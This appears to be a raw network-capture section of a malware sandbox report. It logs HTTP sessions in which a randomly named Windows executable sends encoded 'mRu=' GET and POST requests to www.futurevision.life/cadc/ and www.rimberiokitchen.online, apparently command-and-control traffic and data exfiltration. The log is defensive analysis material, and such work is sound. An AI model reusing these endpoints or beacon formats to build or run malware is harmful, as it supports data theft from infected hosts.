mRu=bnpv5ujJ23BALHq5do4iQsKYLEygggeHdvMGsd6ZYO1OYSjegjtRDlsZV3PjBz7Fu7YXR9tCWmKkQ/BvH+9Y35iALjJaIL+6IjK20GM2Scgf+VTT5VvBx09xghw5zSoTI4MxJ01gCVvrNQx7qpdFKdGGc3jeN6LQjcLGwzHXnPVRxs95tmWxDdcTjDn4BBTRYvzay7TKJr4KBGotzlMWcdTc6uF/1dg2t7R29Yxonfpglp/2IbHSoHSx2A+AJO5m45UOL/mpq0PfUJMBZVe/AekB2ifkypC2ofXBoHbSzKVp76B7Z6P6P0qffeIL9kMc2mIUlOkBCHYdv8w7/y5cBMh5i4ISDdQjFFXSkCnhopHG0p0kOjVWCJHC6NyH2+N3LLgBrYabHNOs0Lawm2oC71aMb9wvxLv9ItTmRuom+Zri9nqIBO/A1rpm3vL0nU1aBUMBDAiGCgCIO2jx1IGffpmP4XVS/ymV+8H+YNQMpIh3Z252em5z8Nf3scyOvS9bCgCHiIiVzz1fpb6siRW+IlB+05dj5GbsDc5g9LJjq4mjDDOCrWxcvnZAfXnH+PqWffe0gdkjCvEaxErgyzJHUEkY9HE9Fp55alL4CyYNVJ/CUOpHA13Hfd3/HujN6CowDtj0+Pa4NVS8Emt5siPbVqwJlqwsqLDa25vSkAchwbDF8z0s1xup4u30ynY+qXV/kJSQC+EuaLBTWUW27SrnH1exjhV7tkpNmBH+hiUTismo1vCb0ZGyigRQ/NvgKkosiEgnS/FnStBYXaSrOm22h0vjM7R1t1iLjck6NGPJ6Ax6Z8uFvyaNe/iIxNQ47NuLh6UA0xlhJmpkVDk9CU9Nm6Ba9k/AvuC7guSLosD0aACF7nOuUo0Rdyqiq+Y1wtHEwRy8sfbk1+RCLcCn+DLZDcx4EycGwE6ygq3KrDhL4Ma1VftSjcXiDKXn5u0S3sT8inpyXauTcmFzU9JXmgqsMx5gsY+3ONgkTW7kzhd0YyCftYTp [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.11.20	49735	208.91.197.27	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:30:57.412678003 CET	485	OUT	GET /xvf3/?mRu=WlBP6ZDj33sme071J7YmRt2meznD9lOMeO4smNCsOshEYDb+rkIOBjcGODqfewmlgMUUULEtW3alEv1cIqlE3oXaOj92B6nyIwOIgW4/F45i+leDgRmHhUA=&UJ=7H1XM HTTP/1.1 Host: www.rimberiokitchen.online Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
Nov 12, 2024 15:30:58.706624985 CET	1003	IN	HTTP/1.1 200 OK Date: Tue, 12 Nov 2024 14:30:57 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=906vr478967457601294220; expires=Sun, 11-Nov-2029 14:30:57 GMT; Max-Age=157680000; path=/; domain=www.rimberiokitchen.online; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_G9wrI8ErGCovIRiUwqpM3lqcVFgMFwvVC+ri2ftv8jyMhilLZEAxv+j+LXbUBYs/7SpZSgQzMtth1xjBKIOL2g== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Connection: close
Nov 12, 2024 15:30:58.706641912 CET	180	IN	Data Raw: 61 34 32 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c Data Ascii: a426<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <
Nov 12, 2024 15:30:58.706651926 CET	1220	IN	Data Raw: 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in wi
Nov 12, 2024 15:30:58.706753969 CET	1220	IN	Data Raw: 70 75 73 68 28 77 69 6e 64 6f 77 2e 63 6d 70 5f 63 75 73 74 6f 6d 6c 61 6e 67 75 61 67 65 73 5b 62 5d 2e 6c 29 7d 7d 7d 72 65 74 75 72 6e 20 61 7d 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 69 Data Ascii: push(window.cmp_customlanguages[b].l)}}}return a};window.cmp_getlang=function(j){if(typeof(j)!="boolean"){j=true}if(j&&typeof(cmp_getlang.usedlang)=="string"&&cmp_getlang.usedlang!==""){return cmp_getlang.usedlang}var g=window.cmp_getsupported
Nov 12, 2024 15:30:58.706774950 CET	1220	IN	Data Raw: 6f 3d 22 22 3b 76 61 72 20 62 3d 22 5f 65 6e 22 3b 69 66 28 22 63 6d 70 5f 67 65 74 6c 61 6e 67 22 20 69 6e 20 68 29 7b 6f 3d 68 2e 63 6d 70 5f 67 65 74 6c 61 6e 67 28 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 69 66 28 22 63 6d 70 5f 63 75 Data Ascii: o="";var b="_en";if("cmp_getlang" in h){o=h.cmp_getlang().toLowerCase();if("cmp_customlanguages" in h){for(var q=0;q<h.cmp_customlanguages.length;q++){if(h.cmp_customlanguages[q].l.toUpperCase()==o.toUpperCase()){o="en";break}}}b="_"+o}functio
Nov 12, 2024 15:30:58.706785917 CET	1220	IN	Data Raw: 26 63 6d 70 67 70 70 6b 65 79 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 72 29 3a 22 22 29 2b 28 6e 21 3d 22 22 3f 22 26 63 6d 70 61 74 74 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 6e 29 3a 22 22 29 Data Ascii: &cmpgppkey="+encodeURIComponent(r):"")+(n!=""?"&cmpatt="+encodeURIComponent(n):"")+("cmp_params" in h?"&"+h.cmp_params:"")+(u.cookie.length>0?"&__cmpfcc=1":"")+"&l="+o.toLowerCase()+"&o="+(new Date()).getTime();j.type="text/javascript";j.async
Nov 12, 2024 15:30:58.706794977 CET	1220	IN	Data Raw: 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3e 30 29 7b 74 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 7d 7d 7d 29 28 29 3b 77 69 6e 64 6f 77 2e 63 6d 70 5f Data Ascii: }if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cssText="display:none";if("cmp_cdn" in window&&"cmp_u
Nov 12, 2024 15:30:58.706804991 CET	1220	IN	Data Raw: 75 65 29 7d 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e 3a 31 2c 75 73 70 53 74 72 69 6e 67 3a 77 69 6e 64 6f 77 2e 63 6d 70 5f 72 63 28 22 22 29 7d 2c 74 72 75 Data Ascii: ue)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"\|\|a[0]==="removeEventListener"){__cmp.a.push([].slice.apply(a))}e
Nov 12, 2024 15:30:58.706856012 CET	1220	IN	Data Raw: 28 67 3d 3d 3d 22 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a 5b 5d 2c 61 70 70 6c 69 63 61 62 6c 65 53 65 63 74 69 6f Data Ascii: (g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"\|\|g==="getSection"\|\|g==="getField"){return null}else{__gpp.q.push([].slice.apply(a))}
Nov 12, 2024 15:30:58.706866980 CET	1220	IN	Data Raw: 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 74 72 69 Data Ascii: Return:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)\|\|(typeof(window[a])!=="function
Nov 12, 2024 15:30:58.706876993 CET	1220	IN	Data Raw: 70 5f 64 69 73 61 62 6c 65 75 73 70 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 Data Ascii: p_disableusp" in window)\|\|!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)\|\|!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.11.20	49736	203.161.49.193	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:04.363424063 CET	762	OUT	POST /cadc/ HTTP/1.1 Host: www.futurevision.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.futurevision.life Referer: http://www.futurevision.life/cadc/ Content-Type: application/x-www-form-urlencoded Content-Length: 200 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 6b 70 31 48 34 74 50 75 33 59 45 4c 65 50 30 6d 33 55 46 33 71 62 53 6a 4e 57 6e 59 39 4c 39 44 44 70 58 32 6f 64 41 6f 4a 78 73 79 63 79 55 68 52 7a 63 36 68 46 4d 61 37 58 71 47 47 36 68 41 48 6c 49 6d 49 71 65 62 52 6d 62 4b 6b 77 46 75 6c 50 69 46 57 57 35 30 7a 68 62 78 58 49 63 4e 58 2b 50 75 34 48 61 45 6b 5a 32 4f 2b 37 76 50 65 6f 59 50 46 59 61 6c 33 69 39 56 35 4d 2f 6d 61 57 32 72 70 74 77 32 39 61 52 43 54 77 54 71 45 78 42 2b 2f 61 4f 76 53 33 2b 50 6a 46 4d 32 65 6f 54 49 37 50 43 55 39 76 63 7a 45 34 48 79 57 52 42 31 41 3d 3d Data Ascii: mRu=/dZgz2HIhZFxdkp1H4tPu3YELeP0m3UF3qbSjNWnY9L9DDpX2odAoJxsycyUhRzc6hFMa7XqGG6hAHlImIqebRmbKkwFulPiFWW50zhbxXIcNX+Pu4HaEkZ2O+7vPeoYPFYal3i9V5M/maW2rptw29aRCTwTqExB+/aOvS3+PjFM2eoTI7PCU9vczE4HyWRB1A==
Nov 12, 2024 15:31:04.558024883 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:31:04 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.11.20	49737	203.161.49.193	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:07.085984945 CET	782	OUT	POST /cadc/ HTTP/1.1 Host: www.futurevision.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.futurevision.life Referer: http://www.futurevision.life/cadc/ Content-Type: application/x-www-form-urlencoded Content-Length: 220 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 45 35 31 42 5a 74 50 35 48 59 48 56 4f 50 30 76 58 56 4d 33 71 58 53 6a 4d 43 33 5a 50 2f 39 44 69 5a 58 6e 61 31 41 72 4a 78 73 6d 4d 79 52 73 78 7a 62 36 68 49 7a 61 2b 76 71 47 47 75 68 41 47 56 49 6d 59 57 52 62 42 6d 5a 66 55 77 48 67 46 50 69 46 57 57 35 30 79 46 39 78 58 77 63 4e 6e 75 50 38 4b 76 56 48 6b 5a 35 65 75 37 76 4c 65 6f 55 50 46 59 38 6c 31 58 61 56 37 45 2f 6d 66 71 32 6f 38 42 33 38 39 62 59 50 7a 78 45 6b 6e 6f 4a 79 37 36 47 35 79 48 4f 44 52 4e 62 7a 49 6c 4a 56 4a 37 6d 58 75 7a 75 33 30 42 76 77 55 51 61 6f 46 68 41 51 4b 61 6d 73 72 52 31 71 78 4b 6f 58 35 62 39 53 5a 6f 3d Data Ascii: mRu=/dZgz2HIhZFxdE51BZtP5HYHVOP0vXVM3qXSjMC3ZP/9DiZXna1ArJxsmMyRsxzb6hIza+vqGGuhAGVImYWRbBmZfUwHgFPiFWW50yF9xXwcNnuP8KvVHkZ5eu7vLeoUPFY8l1XaV7E/mfq2o8B389bYPzxEknoJy76G5yHODRNbzIlJVJ7mXuzu30BvwUQaoFhAQKamsrR1qxKoX5b9SZo=
Nov 12, 2024 15:31:07.284389973 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:31:07 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.11.20	49738	203.161.49.193	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:09.799015045 CET	5156	OUT	POST /cadc/ HTTP/1.1 Host: www.futurevision.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.futurevision.life Referer: http://www.futurevision.life/cadc/ Content-Type: application/x-www-form-urlencoded Content-Length: 7368 Connection: close Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36 Data Raw: 6d 52 75 3d 2f 64 5a 67 7a 32 48 49 68 5a 46 78 64 45 35 31 42 5a 74 50 35 48 59 48 56 4f 50 30 76 58 56 4d 33 71 58 53 6a 4d 43 33 5a 50 48 39 44 52 42 58 32 4d 39 41 71 4a 78 73 6c 4d 79 51 73 78 79 48 36 68 51 2f 61 2b 71 49 47 43 65 68 41 6b 4e 49 79 37 4f 52 55 42 6d 5a 64 55 77 45 75 6c 4f 67 46 51 32 31 30 79 56 39 78 58 77 63 4e 68 71 50 73 49 48 56 4c 45 5a 32 4f 2b 37 64 50 65 70 39 50 46 41 43 6c 31 53 74 55 50 49 2f 6d 37 32 32 34 61 56 33 30 39 62 57 49 7a 78 4d 6b 6e 55 47 79 2f 61 38 35 79 79 68 44 53 39 62 2f 4d 4d 71 50 61 2f 67 42 4d 33 56 33 6b 56 72 79 45 77 4f 32 58 70 2f 62 4d 4f 59 75 62 78 37 6b 54 57 35 49 37 57 37 4d 5a 42 7a 73 58 73 79 41 6d 6e 77 65 68 78 56 55 52 73 71 78 64 4f 32 32 36 6c 31 31 45 4d 5a 34 49 38 39 74 4a 65 37 57 73 4d 4d 76 70 65 5a 49 67 55 76 39 56 36 47 65 4a 79 43 4f 44 4d 7a 34 66 67 32 74 4c 73 51 2b 32 39 38 5a 67 79 63 2b 41 50 53 34 36 58 41 77 67 51 59 4e 59 70 6c 46 57 2b 6b 6f 58 74 42 61 48 74 49 69 55 57 34 7a 49 75 75 45 35 56 4d 6e 67 [TRUNCATED] Data Ascii: mRu=/dZgz2HIhZFxdE51BZtP5HYHVOP0vXVM3qXSjMC3ZPH9DRBX2M9AqJxslMyQsxyH6hQ/a+qIGCehAkNIy7ORUBmZdUwEulOgFQ210yV9xXwcNhqPsIHVLEZ2O+7dPep9PFACl1StUPI/m7224aV309bWIzxMknUGy/a85yyhDS9b/MMqPa/gBM3V3kVryEwO2Xp/bMOYubx7kTW5I7W7MZBzsXsyAmnwehxVURsqxdO226l11EMZ4I89tJe7WsMMvpeZIgUv9V6GeJyCODMz4fg2tLsQ+298Zgyc+APS46XAwgQYNYplFW+koXtBaHtIiUW4zIuuE5VMng8wWQY/wcbf9YFQmdUbndFDrUyM+60QP4VlzeoN+FAZuY8aFywo3590bnv+ztbRp3N6Mg9X3pyBgr/ofeyh3owJXE66WfoL4LEBifKcv5USdxK6sCeYoqH2VqWJaDCHnKIWa1GSO6a5ljnRrhsJ+ElnSXcYpmwSWKQ6xdEGsZA0OS4xhmXJLqZNtGyYeVRzKNMHYRvJgbpD27k/YH23Ix5g9H3HbrdLMuNN/xJWZ3e1p1Alc+lcSINWeJ+uUu7Ucgdo9knqoBoc+/9EbRP0SBa4F2n2cSUZ8qOSqSl6SPaOq5ypjIHgN2RH6QCrxaCG4pBPD3lWXPO0RyfPB2vkWx2IQsDfeOji7VVqiBBjc7P8IaiGCAnptc4o6N+rbyIuHgamd7R2WwJGJm9YmgFSkrKLC0iSphOtJ0WLI5m57sl/Y2AAWBC7ZOuFv5jUP4mdjZ7H7YEwHIw/evOZpP8px23KzlYEren73r13u26rgM6bvbbxu6HXPcRbjEsEWobqGnxxtCyYCd2q/gM5HVSoYyvSnTnPhO91WCXMk82b07MjFIFLGAAFtCcoBHdgNvQoIWEm9EUzDOi5/2kNAIaIwsGrMtP91MVy8fuBxXicuFqBVxhl/vnFaOw3l5V/aqbHp2SJCv+GisuEXp/KQaDz9VylIAeuY0z+GP8d [TRUNCATED]
Nov 12, 2024 15:31:09.799062014 CET	1289	OUT	Data Raw: 41 2f 57 44 39 42 39 4f 4d 6b 6f 69 50 76 78 38 48 45 51 53 52 30 69 41 2f 53 2b 37 4f 58 4c 52 76 55 37 77 6e 4e 59 52 50 6e 37 67 41 45 66 4f 65 73 6f 74 57 72 51 71 58 49 45 36 57 6a 41 38 35 54 7a 56 73 2f 50 6e 49 62 62 31 53 73 69 39 6e 4a Data Ascii: A/WD9B9OMkoiPvx8HEQSR0iA/S+7OXLRvU7wnNYRPn7gAEfOesotWrQqXIE6WjA85TzVs/PnIbb1Ssi9nJK49xx5sfmsuWLFDfUeDEpiWSxN5aK4VUeW0ZLlDKLOaue5oRCGWquOOlqelnTlc9tELENbkHXH2Rrzt4dHBdKvxVG5UQVt1/Qqz+6ciavKomGJX4q1vaimsjcyB9aJAqfPpV3kL6DHbqvHsdQ96WEO75j/LGSmKzC
Nov 12, 2024 15:31:09.799108028 CET	1486	OUT	Data Raw: 4e 54 4e 65 42 43 72 6e 67 2f 6c 55 71 61 79 63 2f 59 64 41 56 36 50 43 4e 4a 74 49 72 75 49 6c 48 63 79 44 56 54 38 55 4f 75 38 63 51 6b 2f 36 41 41 36 49 63 30 6f 62 2f 44 47 64 6b 6b 62 69 38 54 56 37 56 6e 34 6c 71 37 4a 66 4d 2b 36 4c 6c 6d Data Ascii: NTNeBCrng/lUqayc/YdAV6PCNJtIruIlHcyDVT8UOu8cQk/6AA6Ic0ob/DGdkkbi8TV7Vn4lq7JfM+6LlmeDvHDG4BtJle2vkbEtAVoRGjFdnbv5pT6niwh8CMnZi3pulXsDbmYyRFoq+Sdefg4CghuMiqAVBswmzp3SvI5wFH0atX4VZDitAQQ63GWvfyUh52iRikzSNjvx/lqDnUP5mUylkcoon5SKH9Z69CzG25gZiYNbPN1
Nov 12, 2024 15:31:10.014020920 CET	533	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 14:31:09 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.11.20	49739	203.161.49.193	80	2832	C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 15:31:12.503294945 CET	480	OUT	GET /cadc/?mRu=yfxAwDfWka0dfjkEErxT6WYgWaOc4HN689PIo8avXNW9JAsEk9V7nvZjppH3ozqb+GZGdofwBlLzR01W2aLtY3/CfTpxh0qnHwCWqwdq33lIMBmS8NPwCm4=&UJ=7H1XM HTTP/1.1 Host: www.futurevision.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
